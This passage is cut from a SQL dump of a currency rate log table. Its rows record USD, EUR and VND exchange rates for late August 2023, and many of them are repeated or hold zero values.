(8039, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-18'),
(8040, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-18'),
(8041, 1, 'USD', 0.000000, 2, 'EUR', 0.917430, '2023-08-18'),
(8042, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8043, 2, 'EUR', 0.000000, 1, 'USD', 1.090000, '2023-08-18'),
(8044, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8045, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-18'),
(8046, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-18'),
(8047, 1, 'USD', 1.000000, 2, 'EUR', 0.917430, '2023-08-18'),
(8048, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8049, 2, 'EUR', 1.000000, 1, 'USD', 1.090000, '2023-08-18'),
(8050, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8051, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-18'),
(8052, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-18'),
(8053, 1, 'USD', 0.000000, 2, 'EUR', 0.917430, '2023-08-18'),
(8054, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8055, 2, 'EUR', 0.000000, 1, 'USD', 1.090000, '2023-08-18'),
(8056, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8057, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-18'),
(8058, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-18'),
(8059, 1, 'USD', 1.000000, 2, 'EUR', 0.917430, '2023-08-18'),
(8060, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8061, 2, 'EUR', 1.000000, 1, 'USD', 1.090000, '2023-08-18'),
(8062, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8063, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-18'),
(8064, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-18'),
(8065, 1, 'USD', 0.000000, 2, 'EUR', 0.917430, '2023-08-18'),
(8066, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8067, 2, 'EUR', 0.000000, 1, 'USD', 1.090000, '2023-08-18'),
(8068, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-18'),
(8069, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-18'),
(8070, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-18'),
(8071, 1, 'USD', 1.000000, 2, 'EUR', 0.917430, '2023-08-19'),
(8072, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8073, 2, 'EUR', 1.000000, 1, 'USD', 1.090000, '2023-08-19'),
(8074, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8075, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-19'),
(8076, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-19'),
(8077, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-19'),
(8078, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8079, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-19'),
(8080, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8081, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-19'),
(8082, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-19'),
(8083, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-19'),
(8084, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8085, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-19'),
(8086, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8087, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-19'),
(8088, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-19'),
(8089, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-19'),
(8090, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8091, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-19'),
(8092, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8093, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-19'),
(8094, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-19'),
(8095, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-19'),
(8096, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8097, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-19'),
(8098, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8099, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-19'),
(8100, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-19'),
(8101, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-19'),
(8102, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8103, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-19'),
(8104, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8105, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-19'),
(8106, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-19'),
(8107, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-19'),
(8108, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8109, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-19'),
(8110, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8111, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-19'),
(8112, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-19'),
(8113, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-19'),
(8114, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8115, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-19'),
(8116, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-19'),
(8117, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-19'),
(8118, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-19'),
(8119, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-20'),
(8120, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8121, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-20'),
(8122, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8123, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-20'),
(8124, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-20'),
(8125, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-20'),
(8126, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8127, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-20'),
(8128, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8129, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-20'),
(8130, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-20'),
(8131, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-20'),
(8132, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8133, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-20'),
(8134, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8135, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-20'),
(8136, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-20'),
(8137, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-20'),
(8138, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8139, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-20'),
(8140, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8141, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-20'),
(8142, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-20'),
(8143, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-20'),
(8144, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8145, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-20'),
(8146, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8147, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-20'),
(8148, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-20'),
(8149, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-20'),
(8150, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8151, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-20'),
(8152, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8153, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-20'),
(8154, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-20'),
(8155, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-20'),
(8156, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8157, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-20'),
(8158, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8159, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-20'),
(8160, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-20'),
(8161, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-20'),
(8162, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8163, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-20'),
(8164, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-20'),
(8165, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-20'),
(8166, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-20'),
(8167, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-21'),
(8168, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8169, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-21'),
(8170, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8171, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-21'),
(8172, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-21'),
(8173, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-21'),
(8174, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8175, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-21'),
(8176, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8177, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-21'),
(8178, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-21'),
(8179, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-21'),
(8180, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8181, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-21'),
(8182, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8183, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-21'),
(8184, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-21'),
(8185, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-21'),
(8186, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8187, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-21'),
(8188, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8189, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-21'),
(8190, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-21'),
(8191, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-21'),
(8192, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8193, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-21'),
(8194, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8195, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-21'),
(8196, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-21'),
(8197, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-21'),
(8198, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8199, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-21'),
(8200, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8201, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-21'),
(8202, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-21'),
(8203, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-21'),
(8204, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8205, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-21'),
(8206, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8207, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-21'),
(8208, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-21'),
(8209, 1, 'USD', 0.000000, 2, 'EUR', 0.920220, '2023-08-21'),
(8210, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8211, 2, 'EUR', 0.000000, 1, 'USD', 1.086700, '2023-08-21'),
(8212, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-21'),
(8213, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-21'),
(8214, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-21'),
(8215, 1, 'USD', 1.000000, 2, 'EUR', 0.920220, '2023-08-22'),
(8216, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8217, 2, 'EUR', 1.000000, 1, 'USD', 1.086700, '2023-08-22'),
(8218, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8219, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-22'),
(8220, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-22'),
(8221, 1, 'USD', 0.000000, 2, 'EUR', 0.916760, '2023-08-22'),
(8222, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8223, 2, 'EUR', 0.000000, 1, 'USD', 1.090800, '2023-08-22'),
(8224, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8225, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-22'),
(8226, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-22'),
(8227, 1, 'USD', 1.000000, 2, 'EUR', 0.916760, '2023-08-22'),
(8228, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8229, 2, 'EUR', 1.000000, 1, 'USD', 1.090800, '2023-08-22'),
(8230, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8231, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-22'),
(8232, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-22'),
(8233, 1, 'USD', 0.000000, 2, 'EUR', 0.916760, '2023-08-22'),
(8234, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8235, 2, 'EUR', 0.000000, 1, 'USD', 1.090800, '2023-08-22'),
(8236, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8237, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-22'),
(8238, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-22'),
(8239, 1, 'USD', 1.000000, 2, 'EUR', 0.916760, '2023-08-22'),
(8240, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8241, 2, 'EUR', 1.000000, 1, 'USD', 1.090800, '2023-08-22'),
(8242, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8243, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-22'),
(8244, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-22'),
(8245, 1, 'USD', 0.000000, 2, 'EUR', 0.916760, '2023-08-22'),
(8246, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8247, 2, 'EUR', 0.000000, 1, 'USD', 1.090800, '2023-08-22'),
(8248, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8249, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-22'),
(8250, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-22'),
(8251, 1, 'USD', 1.000000, 2, 'EUR', 0.916760, '2023-08-22'),
(8252, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8253, 2, 'EUR', 1.000000, 1, 'USD', 1.090800, '2023-08-22'),
(8254, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8255, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-22'),
(8256, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-22'),
(8257, 1, 'USD', 0.000000, 2, 'EUR', 0.916760, '2023-08-22'),
(8258, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8259, 2, 'EUR', 0.000000, 1, 'USD', 1.090800, '2023-08-22'),
(8260, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-22'),
(8261, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-22'),
(8262, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-22'),
(8263, 1, 'USD', 1.000000, 2, 'EUR', 0.916760, '2023-08-23'),
(8264, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8265, 2, 'EUR', 1.000000, 1, 'USD', 1.090800, '2023-08-23'),
(8266, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8267, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-23'),
(8268, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-23'),
(8269, 1, 'USD', 0.000000, 2, 'EUR', 0.918530, '2023-08-23'),
(8270, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8271, 2, 'EUR', 0.000000, 1, 'USD', 1.088700, '2023-08-23'),
(8272, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8273, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-23'),
(8274, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-23'),
(8275, 1, 'USD', 1.000000, 2, 'EUR', 0.918530, '2023-08-23'),
(8276, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8277, 2, 'EUR', 1.000000, 1, 'USD', 1.088700, '2023-08-23'),
(8278, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8279, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-23'),
(8280, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-23'),
(8281, 1, 'USD', 0.000000, 2, 'EUR', 0.918530, '2023-08-23'),
(8282, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8283, 2, 'EUR', 0.000000, 1, 'USD', 1.088700, '2023-08-23'),
(8284, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8285, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-23'),
(8286, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-23'),
(8287, 1, 'USD', 1.000000, 2, 'EUR', 0.918530, '2023-08-23'),
(8288, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8289, 2, 'EUR', 1.000000, 1, 'USD', 1.088700, '2023-08-23'),
(8290, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8291, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-23'),
(8292, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-23'),
(8293, 1, 'USD', 0.000000, 2, 'EUR', 0.918530, '2023-08-23'),
(8294, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8295, 2, 'EUR', 0.000000, 1, 'USD', 1.088700, '2023-08-23'),
(8296, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8297, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-23'),
(8298, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-23'),
(8299, 1, 'USD', 1.000000, 2, 'EUR', 0.918530, '2023-08-23'),
(8300, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8301, 2, 'EUR', 1.000000, 1, 'USD', 1.088700, '2023-08-23'),
(8302, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8303, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-23'),
(8304, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-23'),
(8305, 1, 'USD', 0.000000, 2, 'EUR', 0.918530, '2023-08-23'),
(8306, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8307, 2, 'EUR', 0.000000, 1, 'USD', 1.088700, '2023-08-23'),
(8308, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-23'),
(8309, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-23'),
(8310, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-23'),
(8311, 1, 'USD', 1.000000, 2, 'EUR', 0.918530, '2023-08-24'),
(8312, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8313, 2, 'EUR', 1.000000, 1, 'USD', 1.088700, '2023-08-24'),
(8314, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8315, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-24'),
(8316, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-24'),
(8317, 1, 'USD', 0.000000, 2, 'EUR', 0.925500, '2023-08-24'),
(8318, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-24');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(8319, 2, 'EUR', 0.000000, 1, 'USD', 1.080500, '2023-08-24'),
(8320, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8321, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-24'),
(8322, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-24'),
(8323, 1, 'USD', 1.000000, 2, 'EUR', 0.925500, '2023-08-24'),
(8324, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8325, 2, 'EUR', 1.000000, 1, 'USD', 1.080500, '2023-08-24'),
(8326, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8327, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-24'),
(8328, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-24'),
(8329, 1, 'USD', 0.000000, 2, 'EUR', 0.925500, '2023-08-24'),
(8330, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8331, 2, 'EUR', 0.000000, 1, 'USD', 1.080500, '2023-08-24'),
(8332, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8333, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-24'),
(8334, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-24'),
(8335, 1, 'USD', 1.000000, 2, 'EUR', 0.925500, '2023-08-24'),
(8336, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8337, 2, 'EUR', 1.000000, 1, 'USD', 1.080500, '2023-08-24'),
(8338, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8339, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-24'),
(8340, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-24'),
(8341, 1, 'USD', 0.000000, 2, 'EUR', 0.925500, '2023-08-24'),
(8342, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8343, 2, 'EUR', 0.000000, 1, 'USD', 1.080500, '2023-08-24'),
(8344, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8345, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-24'),
(8346, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-24'),
(8347, 1, 'USD', 1.000000, 2, 'EUR', 0.925500, '2023-08-24'),
(8348, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8349, 2, 'EUR', 1.000000, 1, 'USD', 1.080500, '2023-08-24'),
(8350, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8351, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-24'),
(8352, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-24'),
(8353, 1, 'USD', 0.000000, 2, 'EUR', 0.925500, '2023-08-24'),
(8354, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8355, 2, 'EUR', 0.000000, 1, 'USD', 1.080500, '2023-08-24'),
(8356, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-24'),
(8357, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-24'),
(8358, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-24'),
(8359, 1, 'USD', 1.000000, 2, 'EUR', 0.925500, '2023-08-25'),
(8360, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8361, 2, 'EUR', 1.000000, 1, 'USD', 1.080500, '2023-08-25'),
(8362, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8363, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-25'),
(8364, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-25'),
(8365, 1, 'USD', 0.000000, 2, 'EUR', 0.922510, '2023-08-25'),
(8366, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8367, 2, 'EUR', 0.000000, 1, 'USD', 1.084000, '2023-08-25'),
(8368, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8369, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-25'),
(8370, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-25'),
(8371, 1, 'USD', 1.000000, 2, 'EUR', 0.922510, '2023-08-25'),
(8372, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8373, 2, 'EUR', 1.000000, 1, 'USD', 1.084000, '2023-08-25'),
(8374, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8375, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-25'),
(8376, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-25'),
(8377, 1, 'USD', 0.000000, 2, 'EUR', 0.922510, '2023-08-25'),
(8378, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8379, 2, 'EUR', 0.000000, 1, 'USD', 1.084000, '2023-08-25'),
(8380, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8381, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-25'),
(8382, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-25'),
(8383, 1, 'USD', 1.000000, 2, 'EUR', 0.922510, '2023-08-25'),
(8384, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8385, 2, 'EUR', 1.000000, 1, 'USD', 1.084000, '2023-08-25'),
(8386, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8387, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-25'),
